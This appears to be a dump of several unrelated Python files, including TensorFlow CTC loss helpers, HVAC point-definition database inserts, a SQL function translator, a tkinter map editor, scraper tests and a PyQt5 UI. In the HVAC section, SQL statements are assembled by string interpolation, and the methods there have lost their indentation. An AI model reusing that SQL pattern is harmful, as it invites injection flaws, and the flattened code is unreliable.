    used_maruti = Maruti(*_read_car_details())
    used_toyota.get_car_info()
    used_maruti.get_car_info()
# FIX: guard the entry point so importing this module doesn't prompt for input.
if __name__ == "__main__":
    main()
|
import tensorflow as tf
# from loss.ctc_ops import ctc_loss_v2, ctc_label_dense_to_sparse, ctc_unique_labels
from loss import ctc_ops
from tensorflow.python.ops import array_ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import sparse_tensor
"""
https://github.com/hirofumi0810/neural_sp/blob/master/neural_sp/models/seq2seq/decoders/ctc.py
"""
def _get_dim(tensor, i):
    """Get value of tensor shape[i] preferring static value if available."""
    static_dim = tensor_shape.dimension_value(tensor.shape[i])
    # Fall back to the dynamic shape op when the static dim is unknown.
    return static_dim or array_ops.shape(tensor)[i]
def check_tf_version():
    """Return True when TF is new enough for ctc_loss_v2 (2.x, or >= x.15)."""
    version = tf.__version__
    print("==tf version==", version)
    tf.logging.info("** version **")
    tf.logging.info(version)
    major, minor = version.split(".")[:2]
    return int(major) >= 2 or int(minor) >= 15
def sparse_ctc_loss(y_true, y_pred, input_length,
                    label_length,
                    time_major=False,
                    blank_index=0):
    """CTC loss over sparse labels with a configurable blank index.

    Converts the dense labels to a SparseTensor, optionally relocates the
    blank class to the last logit column (tf.nn.ctc_loss expects the blank
    there), and remaps label ids above the blank accordingly.

    :param y_true: dense label tensor, cast to int32
    :param y_pred: logits, cast to float32
    :param input_length: per-example logit lengths
    :param label_length: per-example label lengths
    :param time_major: whether y_pred arrives as [time, batch, classes]
    :param blank_index: class index used as the CTC blank; may be negative
    :return: per-example loss from tf.nn.ctc_loss
    """
    y_true = tf.cast(y_true, tf.int32)
    y_pred = tf.cast(y_pred, tf.float32)
    input_length = tf.cast(input_length, tf.int32)
    label_length = tf.cast(label_length, tf.int32)
    # NOTE(review): y_pred is transposed here *and* time_major is forwarded
    # to tf.nn.ctc_loss below — confirm this isn't applying the time-major
    # conversion twice.
    if time_major:
        y_pred = tf.transpose(y_pred, [1,0,2])
    labels = ctc_ops.ctc_label_dense_to_sparse(y_true, label_length)
    logits = y_pred
    if blank_index < 0:
        blank_index += _get_dim(logits, 2)
    if blank_index != _get_dim(logits, 2) - 1:
        # Move the blank logit column to the last position.
        logits = array_ops.concat([
            logits[:, :, :blank_index],
            logits[:, :, blank_index + 1:],
            logits[:, :, blank_index:blank_index + 1],
        ],
            axis=2)
        # Shift label ids above the (removed) blank down by one.
        labels = sparse_tensor.SparseTensor(
            labels.indices,
            array_ops.where(labels.values < blank_index, labels.values,
                            labels.values - 1), labels.dense_shape)
    tf.logging.info("** blank_index **")
    tf.logging.info(blank_index)
    return tf.nn.ctc_loss(
        labels=labels,
        inputs=logits,
        sequence_length=input_length,
        preprocess_collapse_repeated=False,
        ctc_merge_repeated=True,
        time_major=time_major
    )
def dense_ctc_loss(y_true, y_pred,
                   input_length,
                   label_length,
                   indices=None,
                   blank_index=0,
                   time_major=False):
    """CTC loss over dense labels, dispatching on the TF version.

    Uses tf.nn.ctc_loss_v2 on TF >= 1.15 / 2.x and the vendored
    ctc_ops.ctc_loss_v2 otherwise.

    :param y_true: dense label tensor, cast to int32
    :param y_pred: logits, cast to float32
    :param input_length: per-example logit lengths
    :param label_length: per-example label lengths
    :param indices: optional precomputed ctc_unique_labels result
    :param blank_index: class index used as the CTC blank; may be negative
    :param time_major: whether y_pred arrives as [time, batch, classes]
    :return: per-example CTC loss
    """
    # NOTE(review): y_pred is transposed here *and* time_major is forwarded
    # to the loss call below — confirm this isn't applying the time-major
    # conversion twice.
    if time_major:
        y_pred = tf.transpose(y_pred, [1,0,2])
    y_true = tf.cast(y_true, tf.int32)
    y_pred = tf.cast(y_pred, tf.float32)
    input_length = tf.cast(input_length, tf.int32)
    label_length = tf.cast(label_length, tf.int32)
    tf.logging.info("*** y_true ***")
    tf.logging.info(y_true)
    tf.logging.info("*** time_major ***")
    tf.logging.info(time_major)
    tf.logging.info("*** y_pred ***")
    tf.logging.info(y_pred)
    tf.logging.info("*** input_length ***")
    tf.logging.info(input_length)
    tf.logging.info("*** label_length ***")
    tf.logging.info(label_length)
    print(indices, "===indices===")
    if blank_index < 0:
        blank_index += _get_dim(y_pred, 2)
    tf.logging.info("** blank_index **")
    tf.logging.info(blank_index)
    if check_tf_version():
        # indices = tf.nn.ctc_unique_labels(
        #     y_true, name=None
        # )
        tf.logging.info("** ctc_unique_labels **")
        tf.logging.info(indices)
        return tf.nn.ctc_loss_v2(
            labels=y_true,
            logits=y_pred,
            label_length=label_length,
            logit_length=input_length,
            logits_time_major=time_major,
            unique=indices,
            blank_index=blank_index
        )
    else:
        # indices = ctc_ops.ctc_unique_labels(
        #     y_true, name=None
        # )
        tf.logging.info("** ctc_unique_labels **")
        tf.logging.info(indices)
        return ctc_ops.ctc_loss_v2(
            labels=y_true,
            logit_length=input_length,
            logits=y_pred,
            label_length=label_length,
            logits_time_major=time_major,
            unique=indices,
            blank_index=blank_index
        )
from deltaconnection import make_connection
from __variables_creation import Variables
import logging
class AhuVariables(Variables):
    def __init__(self, *args, **kwargs):
        """Collect setup info and declare the fixed AHU point fixtures.

        Recognized kwargs:
            points_list: list of points (stored; not used in this class)
            setup_info: dict with at least device_id, site_id and the
                *_variables selection flags read by the create_* methods
        """
        super().__init__(*args, **kwargs)
        self.points_list = []
        self.setup_dict = {}
        for key, value in kwargs.items():
            if key == 'points_list':
                self.points_list = value
            elif key == 'setup_info':
                self.setup_dict = value
            else:
                pass  # unrecognized kwargs are silently ignored
        # Each entry is a pre-rendered "INSTANCE,'Name','Units'" fragment
        # spliced directly into the INSERT statements by create_analog_variables().
        self.analog_variables_list = [
            "1,'Outside Air Temperature Transfer','°F'",
            "2,'Outside Air Humidity Transfer','%RH'",
            "3,'Outside Air Wetbulb Temperature Transfer','°F'",
            "4,'Outside Air CO2 Transfer','ppm'",
            "5,'Outside Air Enthalpy Transfer','BTU/lb'",
            "6,'Return Air Enthalpy','BTU/lb'",
            "21,'Supply Duct Static Pressure Setpoint','inWC'",
            "22,'Supply Discharge High Limit Static Pressure Setpoint','inWC'",
            "23,'Return Fan CFM Setpoint','CFM'",
            "24,'Return Plenum Static Pressure Low Limit Setpoint','inWC'",
            "25,'Building Static Pressure Setpoint','inWC'",
            "26,'Mixed Air Plenum Static Pressure Low Limit Setpoint','inWC'",
            "31,'Supply Air Heating Setpoint','°F'",
            "32,'Supply Air Cooling Setpoint','°F'",
            "33,'Return Air Temperature Setpoint','°F'",
            "34,'Preheat Air Temperature Setpoint','°F'",
            "35,'Mixed Air Temperature Setpoint','°F'",
            "36,'Mixed Air Low Limit Temperature Setpoint','°F'",
            "37,'Economizer Enable Setpoint','°F'",
            "41,'Humidifier Enable Setpoint','%RH'",
            "42,'Return Air Humidity Setpoint','%RH'",
            "43,'Space Humidity Setpoint','%RH'",
            "44,'Humidity High Limit Setpoint','%RH'",
            "45,'Dehumidification Setpoint','%RH'",
            "46,'Unoccupied Dehumidification Setpoint','%RH'",
            "51,'Minimum Outside Air CFM Setpoint','CFM'",
            "52,'Maximum Outside Air CFM Setpoint (CO2)','CFM'",
            "53,'Minimum Outside Air CFM Setpoint (CO2)','CFM'",
            "54,'Demand Ventilation CO2 Setpoint','ppm'",
            "61,'Occupied Space Temperature Setpoint','°F'",
            "62,'Active Space Heating Setpoint','°F'",
            "63,'Active Space Cooling Setpoint','°F'",
            "64,'Occupied Space Temperature Setpoint Deadband','°F'",
            "71,'Unoccupied Heating Setpoint','°F'",
            "72,'Unoccupied Cooling Setpoint','°F'",
            "73,'Unoccupied Space Temperature Setpoint Deadband','°F'",
            "77,'Average Space Temperature','°F'",
            "78,'Lowest Space Temperature','°F'",
            "79,'Highest Space Temperature','°F'",
            "81,'Hot Water Runaround Pump Enable Setpoint','°F'",
            "91,'Supply VFD Control Ramp','%'",
            "92,'Return VFD Control Ramp','%'",
            "93,'Damper Control Ramp','%'",
            "94,'Valve Control Ramp','%'",
            "95,'Fan Control Ramp','%'",
            "96,'Humidifier Control Ramp','%'"
        ]
        # "INSTANCE, 'Name', 'Type_Reference'" fragments for binary variables.
        self.binary_variables_list = [
            "1,'AHU Enable','BDC7'",
            "2, 'AHU Fan Request', 'BDC5'",
            "3, 'Afterhours Override', 'BDC5'",
            "11, 'Hot Water Available', 'BDC5'",
            "21, 'Mechanical Cooling Available', 'BDC5'",
            "31, 'Economizer Mode Enable', 'BDC5'",
            "32, 'CO2 Demand Ventilation Mode Enable', 'BDC5'",
            "41, 'Humidifier Enable', 'BDC5'",
            "42, 'Dehumidification Enable', 'BDC5'",
            "51, 'Supply Fans Operational Status', 'BDC5'",
            "52, 'Return Fans Operational Status', 'BDC5'"
        ]
        # Multistate variables referencing the MIC objects declared below.
        self.multistate_variables_list = [
            "1, 'AHU Mode', 'MIC21'",
            "2, 'AHU Status', 'MIC22'"
        ]
        # MIC (multistate text) objects.
        self.mic_list = [
            "'Controller Modes', 'MIC21'",
            "'Controller Status', 'MIC22'"
        ]
        # Rows of [MIC id, state number, state text, object instance].
        self.mic_state_text_list = [
            ['MIC21', 1, 'Unoccupied', 21],
            ['MIC21', 2, 'Occupied', 21],
            ['MIC21', 3, 'Warmup', 21],
            ['MIC21', 4, 'Unoccupied Override', 21],
            ['MIC21', 5, 'Autozero', 21],
            ['MIC21', 6, 'Unoccupied Heat_Cool', 21],
            ['MIC21', 7, 'Unoccupied Dehumid', 21],
            ['MIC21', 8, 'Cooldown', 21],
            ['MIC21', 9, 'Airflow Calibration', 21],
            ['MIC22', 1, 'Heating', 22],
            ['MIC22', 2, 'Cooling', 22],
            ['MIC22', 3, 'Deadband', 22],
            ['MIC22', 4, 'Zero Calibration', 22],
            ['MIC22', 5, 'Smoke Evacuation', 22]
        ]
def create_analog_variables(self):
logging.basicConfig(filename='app.log', filemode='a', format='%(levelname)s - %(message)s')
logger = logging.getLogger()
logger.setLevel(logging.INFO)
if self.setup_dict['analog_variables'] == 2:
for row in range(len(self.analog_variables_list)):
try:
sql_statement = f"INSERT INTO OBJECT_V4_AV (DEV_ID, INSTANCE, Object_Name, Units, SITE_ID) " \
f"VALUES ({self.setup_dict['device_id']},{self.analog_variables_list[row]}," \
f"'{self.setup_dict['site_id']}') "
make_connection(sql_statement)
logger.info(f"Created Successfully\n\t"
f"{self.setup_dict['device_id']}, AV{self.analog_variables_list[row]}\n")
except:
logger.info(f"!!!!!Failed to create AV{self.analog_variables_list[row]}!!!!!")
else:
logger.info(f"Analog Variables were not selected for creation.")
def create_binary_variable(self):
logging.basicConfig(filename='app.log', filemode='a', format='%(levelname)s - %(message)s')
logger = logging.getLogger()
logger.setLevel(logging.INFO)
if self.setup_dict['binary_variables'] == 2:
for row in range(len(self.binary_variables_list)):
try:
sql_statement = f"INSERT INTO OBJECT_V4_BV (DEV_ID, INSTANCE, Object_Name, Type_Reference, SITE_ID) " \
f"VALUES ({self.setup_dict['device_id']},{self.binary_variables_list[row]}," \
f"'{self.setup_dict['site_id']}') "
make_connection(sql_statement)
logger.info(f"Created Successfully\n\t"
f"{self.setup_dict['device_id']}, BV{self.binary_variables_list[row]}\n")
except:
logger.info(f"!!!!!Failed to create BV{self.binary_variables_list[row]}!!!!!")
else:
logger.info(f"Binary Variables were not selected for creation.")
def create_multistate_variables(self):
logging.basicConfig(filename='app.log', filemode='a', format='%(levelname)s - %(message)s')
logger = logging.getLogger()
logger.setLevel(logging.INFO)
if self.setup_dict['multistate_variables'] == 2:
for row in range(len(self.multistate_variables_list)):
try:
sql_statement = f"INSERT INTO OBJECT_V4_MV (DEV_ID, INSTANCE,Object_Name, Type_Reference, SITE_ID) " \
f"VALUES ({self.setup_dict['device_id']},{self.multistate_variables_list[row]}," \
f"'{self.setup_dict['site_id']}') "
make_connection(sql_statement)
logger.info(f"Created Successfully\n\t"
f"{self.setup_dict['device_id']}, MV{self.multistate_variables_list[row]}\n")
except:
logger.info(f"!!!!!Failed to create MV{self.multistate_variables_list[row]}!!!!!")
else:
logger.info(f"Multistate Variables were not selected for creation.")
def create_mics(self):
logging.basicConfig(filename='app.log', filemode='a', format='%(levelname)s - %(message)s')
logger = logging.getLogger()
logger.setLevel(logging.INFO)
if self.setup_dict['multistate_variables'] == 2:
for row in range(len(self.mic_list)):
try:
sql_statement = f"INSERT INTO OBJECT_V4_MIC (DEV_ID, Object_Name, Object_Identifier, SITE_ID)" \
f"VALUES ({self.setup_dict['device_id']}, {self.mic_list[row]}, " \
f"'{self.setup_dict['site_id']}')"
make_connection(sql_statement)
logger.info(f"Created Successfully\n\t{self.setup_dict['device_id']}, MIC{self.mic_list[row]}\n")
except:
logger.info(f"!!!!!Failed to create MIC{self.mic_list[row]}!!!!!")
for row in range(len(self.mic_state_text_list)):
idx = self.mic_state_text_list[row][1]
state_text = self.mic_state_text_list[row][2]
mic_instance = self.mic_state_text_list[row][3]
try:
sql_statement = f"Insert Into ARRAY_V4_MIC_STATE_TEXT (DEV_ID, IDX, State_Text, INSTANCE, SITE_ID)" \
f"Values({self.setup_dict['device_id']}, {idx}, '{state_text}',{mic_instance}, " \
f"'{self.setup_dict['site_id']}')"
make_connection(sql_statement)
except:
pass
|
import keyword_maps
import re
import pandas as pd
keywords_map = keyword_maps.keywords_map
def map_function(str1):
    """Translate a (possibly nested) SQL-style function expression into its
    mapped equivalent using the module-level keywords_map.

    Innermost calls are resolved first; each resolved call is replaced by the
    placeholder '$x' in the working string so outer calls can be matched on
    the next pass.  Returns the fully substituted expression, or
    "Not Available" when nothing matched.

    Fixes: regex is now a raw string (avoids invalid-escape warnings), the
    builtin name `all` is no longer shadowed, and dead locals were removed.
    """
    original_input = str1  # untouched copy, used to detect 'from'-style argument lists
    converted = {}
    list_param = {}
    for _ in range(str1.count('(')):
        func_parameters = {}
        # Match an identifier followed by a parenthesized argument list that
        # contains no nested parentheses, i.e. the innermost call.
        ptrn = r"\s*([a-zA-Z_]\w*[(](\s*[a-zA-Z_]\w*[(]|[^()]+)[)])"
        matches = re.findall(ptrn, str1)
        if matches:
            # Split arguments either on 'from' (e.g. SUBSTRING(x from y)) or on commas.
            if 'from' in matches[0][1]:
                list_param[matches[0][0]] = matches[0][1].replace(')', '').split('from')
            else:
                list_param[matches[0][0]] = matches[0][1].replace(')', '').split(',')
            i = 0
            for val in list_param[matches[0][0]]:
                i = i + 1
                func_parameters[str(i) + "_"] = val
            # Collapse the resolved call to '$x' so the next pass sees outer calls.
            str1 = str1.replace(matches[0][0], '$x')
            converted[matches[0][0].split('(')[0]] = func_parameters
    # Convert arguments through the keyword map.
    for k, v in converted.items():
        for key, args in v.items():
            if args in keywords_map.keys():
                converted[k][key] = keywords_map[args]
    # Convert function names through the keyword map; unknown names are
    # rebuilt verbatim with their (positional) argument keys.
    new_dict = {}
    for k, v in converted.items():
        known_names = [name.split('(')[0] for name in keywords_map.keys()]
        for key in keywords_map.keys():
            if k in key.split('(')[0]:
                new_dict[keywords_map[key]] = v
            elif k not in known_names:
                if "from" in original_input:
                    strf = k + "(" + str("from".join(v.keys())).replace("'", "") + ")"
                else:
                    strf = k + "(" + str(",".join(v.keys())).replace("'", "") + ")"
                new_dict[strf] = v
    # Substitute the positional argument keys ('1_', '2_', ...) with values.
    list_of_part = []
    for k, v in new_dict.items():
        for key, val in v.items():
            k = k.replace(str(key), val)
        list_of_part.append(k)
    # Re-nest: each later part absorbs the previously built part via '$x'.
    final = []
    for i, e in enumerate(list_of_part):
        if len(final) < 1:
            final.append(e)
        else:
            final.append(e.replace('$x', final[i - 1]))
    if final:
        return final[-1]
    return "Not Available"
def map_direct(direct_map):
    """Return *direct_map* (SQL function -> converted function) as a
    DataFrame with columns: index, SQL_Functions, Converted_Functions."""
    rows = list(direct_map.items())
    frame = pd.DataFrame(rows, columns=['SQL_Functions', 'Converted_Functions'])
    return frame.reset_index()
|
#! python3
import sys
import traceback
import os
import xml.etree.ElementTree as ET
from tkinter import *
import tkinter.filedialog
from modules.map_data_view import MapDataView
from modules.map_border_view import MapBorderView
from modules.map_view import MapView
from modules.utils import getGameDir
from modules.tilemap import Tilemap
class App():
    """Main window controller for the Ditto map editor.

    Wires up the menu bar, the data/border panels on the left, the map canvas
    on the right, and implements Open/Save/Save As for map XML files.
    """
    def __init__(self, master):
        self.master = master
        self.fn = None        # path of the currently open map file, or None
        self.gameDir = None   # game root directory derived from the map path
        self.master.wm_title("Ditto map editor")
        # menu bar
        self.menu = Menu(self.master)
        self.master.config(menu=self.menu)
        filemenu = Menu(self.menu)
        self.menu.add_cascade(label="File", menu=filemenu)
        filemenu.add_command(label="New", command=self.callback, accelerator="Ctrl+N")
        filemenu.add_command(label="Open", command=self.menu_open, accelerator="Ctrl+O")
        filemenu.add_command(label="Save", command=self.menu_save, accelerator="Ctrl+S")
        filemenu.add_command(label="Save As", command=self.menu_saveas)
        # left-hand column: map data panel above border panel
        self.lhFrame = Frame(self.master)
        self.lhFrame.pack(side=LEFT)
        self.mapDataView = MapDataView(self.lhFrame)
        self.mapDataView.pack(side=TOP, fill=X)
        self.mapBorderView = MapBorderView(self.lhFrame)
        self.mapBorderView.pack(side=TOP, fill=X)
        # map canvas takes the remaining space
        self.mapView = MapView(self.master)
        self.mapView.pack(side=RIGHT, fill=BOTH, expand=1)
        self.master.bind_all("<Control-o>", self.menu_open)
        self.master.bind_all("<Control-s>", self.menu_save)
    def menu_open(self, *args):
        """Prompt for a map XML file and load it into all three views."""
        fn = tkinter.filedialog.askopenfilename(initialdir=".", filetypes=(("XML files", ".xml"),))
        # A cancelled dialog may return "" or an empty tuple depending on the
        # platform, so test truthiness instead of comparing against "".
        # Also keep the previously open file on cancel.
        if fn:
            self.fn = fn
            self.master.wm_title("Ditto map editor: {}".format(os.path.split(self.fn)[1]))
            self.gameDir = getGameDir(self.fn)
            if not self.gameDir:
                raise ValueError("could not determine game directory for {}".format(self.fn))
            self.map = Tilemap(self.fn)
            self.mapDataView.showData(self.fn)
            self.mapBorderView.showData(self.fn, self.map)
            self.mapView.showData(self.map)
    def _write_map(self, path):
        """Serialize all three views into a <map> element and write to path."""
        root = ET.Element("map")
        self.mapDataView.dumpOnto(root)
        self.mapBorderView.dumpOnto(root)
        self.mapView.dumpOnto(root)
        tree = ET.ElementTree(root)
        tree.write(path)
    def menu_save(self, *args):
        """Save to the current file; fall back to Save As when none is open.

        Previously crashed (tree.write(None)) if Save was used before a file
        had been opened.
        """
        if not self.fn:
            self.menu_saveas()
            return
        self._write_map(self.fn)
    def menu_saveas(self, *args):
        """Prompt for a destination, save there, and remember the new path."""
        saveFn = tkinter.filedialog.asksaveasfilename(initialdir=".", filetypes=(("XML files", ".xml"),), defaultextension=".xml")
        if saveFn:
            self.fn = saveFn
            self.master.wm_title("Ditto map editor: {}".format(os.path.split(self.fn)[1]))
            self._write_map(saveFn)
    def callback(self, *args):
        """Placeholder handler for the unimplemented "New" action."""
        print("Callback")
if __name__ == "__main__":
    # Run the editor; if anything blows up, dump the traceback and block on
    # input() so a console window stays open long enough to read it.
    try:
        tk_root = Tk()
        editor = App(tk_root)
        tk_root.mainloop()
    except Exception:
        print("Python exception generated!")
        print("-" * 20)
        traceback.print_exc(file=sys.stdout)
        print("-" * 20)
        input()
|
import pytest
from tests.utils import file_response
from city_scrapers.spiders.det_schools import Det_schoolsSpider
# Fixture data: parse a saved copy of the DPS board-meetings page once at
# import time; every test below asserts against this shared result.
test_response = file_response('files/det_schools.html', url='http://detroitk12.org/board/meetings/')
spider = Det_schoolsSpider()
parsed_items = [item for item in spider.parse(test_response) if isinstance(item, dict)]
# def test_id():
# assert parsed_items[0]['id'] == 'det_schools/201804170900/MmlhcTcyNW50Nm43dWZqN3BpOWwzYmF1ZzRfMjAxODA0MTdUMTMwMDAwWiA4bmpua21kbzgxcDdyZGw0MjA4dDI2MmM2b0Bn/policy_ad_hoc_sub_committee_meeting_open'
def test_name():
    """First event carries the expected meeting name from the fixture."""
    expected_name = 'Policy Ad-hoc Sub-Committee Meeting (Open)'
    assert parsed_items[0]['name'] == expected_name
def test_description():
    """The description mirrors the meeting name on this page."""
    expected_description = 'Policy Ad-hoc Sub-Committee Meeting (Open)'
    assert parsed_items[0]['description'] == expected_description
def test_start_time():
    """Start time parses to 9:00 AM local on 2018-04-17."""
    expected_start = '2018-04-17T09:00:00'
    assert parsed_items[0]['start_time'].isoformat() == expected_start
def test_end_time():
    """End time parses to 10:30 AM local on 2018-04-17."""
    expected_end = '2018-04-17T10:30:00'
    assert parsed_items[0]['end_time'].isoformat() == expected_end
def test_location():
    """Location has only a street address; url, name and coords are blank."""
    expected_location = {
        'url': '',
        'name': '',
        'address': 'Fisher Building, 3011 W. Grand Boulevard, 12th Floor Conference Room',
        'coordinates': {'latitude': '', 'longitude': ''},
    }
    assert parsed_items[0]['location'] == expected_location
def test_sources():
    """Each item records the scraped page as its single source."""
    expected_sources = [{'url': 'http://detroitk12.org/board/meetings/', 'note': ''}]
    assert parsed_items[0]['sources'] == expected_sources
##### PARAMETRIZED TESTS #####
@pytest.mark.parametrize('item', parsed_items)
def test_type(item):
    """Every parsed item is an event.

    Fixed: the assertion used parsed_items[0] instead of the parametrized
    *item*, so only the first item was ever actually checked.
    """
    assert item['_type'] == 'event'
@pytest.mark.parametrize('item', parsed_items)
def test_classification(item):
    """All board meetings are classified as education events."""
    expected = 'education'
    assert item['classification'] == expected
@pytest.mark.parametrize('item', parsed_items)
def test_timezone(item):
    """All events carry the Detroit timezone identifier."""
    expected = 'America/Detroit'
    assert item['timezone'] == expected
@pytest.mark.parametrize('item', parsed_items)
def test_status(item):
    """Scraped meetings default to tentative status."""
    expected = 'tentative'
    assert item['status'] == expected
@pytest.mark.parametrize('item', parsed_items)
def test_all_day(item):
    """Timed meetings are never flagged as all-day events."""
    assert item['all_day'] is False
|
#!/usr/bin/env python
#-*- coding: UTF-8 -*-
import sys
import os
sys.path.append('/Users/dingyang/tim/extra/my/wall/Mac-command-wallpaper-master/bin')
from weather import address
from weather import city
from weather import fiveday
if __name__ == '__main__':
    # Print the five-day forecast provided by the bundled weather package.
    print(fiveday.getFives())
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'blochin.ui'
#
# Created by: PyQt5 UI code generator 5.11.3
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MainWindow(object):
    """pyuic5-generated layout for the main window (from blochin.ui).

    NOTE(review): this class is generated code — regenerate with pyuic5
    instead of hand-editing; manual changes will be lost.
    """
    def setupUi(self, MainWindow):
        """Create and position every widget of the window (generated code)."""
        MainWindow.setObjectName("MainWindow")
        MainWindow.resize(988, 873)
        self.centralwidget = QtWidgets.QWidget(MainWindow)
        self.centralwidget.setObjectName("centralwidget")
        # Tab widget switching between the two work modes (labels set in retranslateUi).
        self.tabWidget = QtWidgets.QTabWidget(self.centralwidget)
        self.tabWidget.setGeometry(QtCore.QRect(0, 0, 1121, 861))
        self.tabWidget.setStyleSheet("QTabWidget::pane{border: 1px solid grey;background-image:url(云.jpg);}" + \
        "QTabBar::tab{min-width:95px;min-height:45px;background:transparent;}" + \
        "QTabBar::tab{font:9pt \"黑体\";}" + \
        "QTabBar::tab:selected{color:white;background-color:rgb(0, 85, 127);}" + \
        "QTabBar::tab:!selected{color: black;background:transparent;}")
        self.tabWidget.setObjectName("tabWidget")
        self.tab = QtWidgets.QWidget()
        self.tab.setObjectName("tab")
        self.tabWidget.addTab(self.tab, "")
        self.tab_2 = QtWidgets.QWidget()
        self.tab_2.setObjectName("tab_2")
        self.tabWidget.addTab(self.tab_2, "")
        # Central group: transcription output (sentence_box) over keyword output.
        self.groupBox = QtWidgets.QGroupBox(self.centralwidget)
        self.groupBox.setGeometry(QtCore.QRect(280, 60, 661, 511))
        self.groupBox.setTitle("")
        self.groupBox.setObjectName("groupBox")
        self.sentence_box = QtWidgets.QTextBrowser(self.groupBox)
        self.sentence_box.setGeometry(QtCore.QRect(20, 20, 621, 311))
        font = QtGui.QFont()
        font.setFamily("Arial")
        font.setPointSize(11)
        font.setBold(False)
        font.setItalic(False)
        font.setWeight(50)
        self.sentence_box.setFont(font)
        self.sentence_box.setReadOnly(False)
        self.sentence_box.setObjectName("sentence_box")
        self.keyword_box = QtWidgets.QTextBrowser(self.groupBox)
        self.keyword_box.setGeometry(QtCore.QRect(20, 360, 621, 131))
        self.keyword_box.setObjectName("keyword_box")
        self.groupBox_1 = QtWidgets.QGroupBox(self.centralwidget)
        self.groupBox_1.setGeometry(QtCore.QRect(40, 370, 181, 121))
        self.groupBox_1.setStyleSheet("font: 10pt \"黑体\";")
        self.groupBox_1.setAlignment(QtCore.Qt.AlignCenter)
        self.groupBox_1.setObjectName("groupBox_1")
        self.groupBox_2 = QtWidgets.QGroupBox(self.centralwidget)
        self.groupBox_2.setGeometry(QtCore.QRect(280, 600, 661, 221))
        self.groupBox_2.setTitle("")
        self.groupBox_2.setObjectName("groupBox_2")
        # Left column, lower group: blockchain action buttons.
        self.groupBox_3 = QtWidgets.QGroupBox(self.centralwidget)
        self.groupBox_3.setGeometry(QtCore.QRect(40, 510, 181, 281))
        font = QtGui.QFont()
        font.setFamily("黑体")
        font.setPointSize(10)
        font.setBold(False)
        font.setItalic(False)
        font.setWeight(50)
        self.groupBox_3.setFont(font)
        self.groupBox_3.setStyleSheet("font: 10pt \"黑体\";")
        self.groupBox_3.setAlignment(QtCore.Qt.AlignCenter)
        self.groupBox_3.setObjectName("groupBox_3")
        self.mine_but = QtWidgets.QPushButton(self.groupBox_3)
        self.mine_but.setGeometry(QtCore.QRect(40, 40, 101, 51))
        font = QtGui.QFont()
        font.setFamily("黑体")
        font.setPointSize(9)
        font.setBold(False)
        font.setItalic(False)
        font.setWeight(50)
        self.mine_but.setFont(font)
        self.mine_but.setStyleSheet("font: 9pt \"黑体\";\n"
"")
        self.mine_but.setObjectName("mine_but")
        self.add_but = QtWidgets.QPushButton(self.groupBox_3)
        self.add_but.setGeometry(QtCore.QRect(40, 120, 101, 51))
        font = QtGui.QFont()
        font.setFamily("黑体")
        font.setPointSize(9)
        font.setBold(False)
        font.setItalic(False)
        font.setWeight(50)
        self.add_but.setFont(font)
        self.add_but.setStyleSheet("font: 9pt \"黑体\";")
        self.add_but.setObjectName("add_but")
        self.inquire_but = QtWidgets.QPushButton(self.groupBox_3)
        self.inquire_but.setGeometry(QtCore.QRect(40, 200, 101, 51))
        font = QtGui.QFont()
        font.setFamily("黑体")
        font.setPointSize(9)
        font.setBold(False)
        font.setItalic(False)
        font.setWeight(50)
        self.inquire_but.setFont(font)
        self.inquire_but.setStyleSheet("font: 9pt \"黑体\";")
        self.inquire_but.setObjectName("inquire_but")
        self.status_label_3 = QtWidgets.QLabel(self.centralwidget)
        self.status_label_3.setGeometry(QtCore.QRect(20, 810, 161, 16))
        font = QtGui.QFont()
        font.setFamily("Arial")
        font.setPointSize(9)
        font.setBold(False)
        font.setItalic(False)
        font.setWeight(50)
        self.status_label_3.setFont(font)
        self.status_label_3.setStyleSheet("font: 9pt \"Arial\";")
        self.status_label_3.setObjectName("status_label_3")
        self.blockchain_box = QtWidgets.QTextBrowser(self.centralwidget)
        self.blockchain_box.setGeometry(QtCore.QRect(300, 620, 621, 181))
        self.blockchain_box.setObjectName("blockchain_box")
        # Left column, upper group: live speech-transcription controls.
        self.groupBox_4 = QtWidgets.QGroupBox(self.centralwidget)
        self.groupBox_4.setGeometry(QtCore.QRect(40, 70, 181, 281))
        font = QtGui.QFont()
        font.setFamily("黑体")
        font.setPointSize(10)
        font.setBold(False)
        font.setItalic(False)
        font.setWeight(50)
        self.groupBox_4.setFont(font)
        self.groupBox_4.setStyleSheet("font: 10pt \"黑体\";")
        self.groupBox_4.setAlignment(QtCore.Qt.AlignCenter)
        self.groupBox_4.setObjectName("groupBox_4")
        self.start_but = QtWidgets.QPushButton(self.groupBox_4)
        self.start_but.setGeometry(QtCore.QRect(40, 40, 101, 51))
        font = QtGui.QFont()
        font.setFamily("Arial")
        font.setPointSize(10)
        font.setBold(False)
        font.setItalic(False)
        font.setWeight(50)
        self.start_but.setFont(font)
        self.start_but.setStyleSheet("font: 10pt \"Arial\";\n"
"")
        self.start_but.setObjectName("start_but")
        self.stop_but = QtWidgets.QPushButton(self.groupBox_4)
        self.stop_but.setGeometry(QtCore.QRect(40, 120, 101, 51))
        font = QtGui.QFont()
        font.setFamily("Arial")
        font.setPointSize(10)
        font.setBold(False)
        font.setItalic(False)
        font.setWeight(50)
        self.stop_but.setFont(font)
        self.stop_but.setStyleSheet("font: 10pt \"Arial\";")
        self.stop_but.setObjectName("stop_but")
        self.play_but = QtWidgets.QPushButton(self.groupBox_4)
        self.play_but.setGeometry(QtCore.QRect(40, 200, 101, 51))
        font = QtGui.QFont()
        font.setFamily("Arial")
        font.setPointSize(10)
        font.setBold(False)
        font.setItalic(False)
        font.setWeight(50)
        self.play_but.setFont(font)
        self.play_but.setStyleSheet("font: 10pt \"Arial\";")
        self.play_but.setObjectName("play_but")
        self.keyword_but = QtWidgets.QPushButton(self.centralwidget)
        self.keyword_but.setGeometry(QtCore.QRect(80, 410, 101, 51))
        font = QtGui.QFont()
        font.setFamily("Arial")
        font.setPointSize(10)
        font.setBold(False)
        font.setItalic(False)
        font.setWeight(50)
        self.keyword_but.setFont(font)
        self.keyword_but.setStyleSheet("font: 10pt \"Arial\";")
        self.keyword_but.setObjectName("keyword_but")
        MainWindow.setCentralWidget(self.centralwidget)
        self.menubar = QtWidgets.QMenuBar(MainWindow)
        self.menubar.setGeometry(QtCore.QRect(0, 0, 988, 18))
        self.menubar.setObjectName("menubar")
        MainWindow.setMenuBar(self.menubar)
        self.statusbar = QtWidgets.QStatusBar(MainWindow)
        self.statusbar.setObjectName("statusbar")
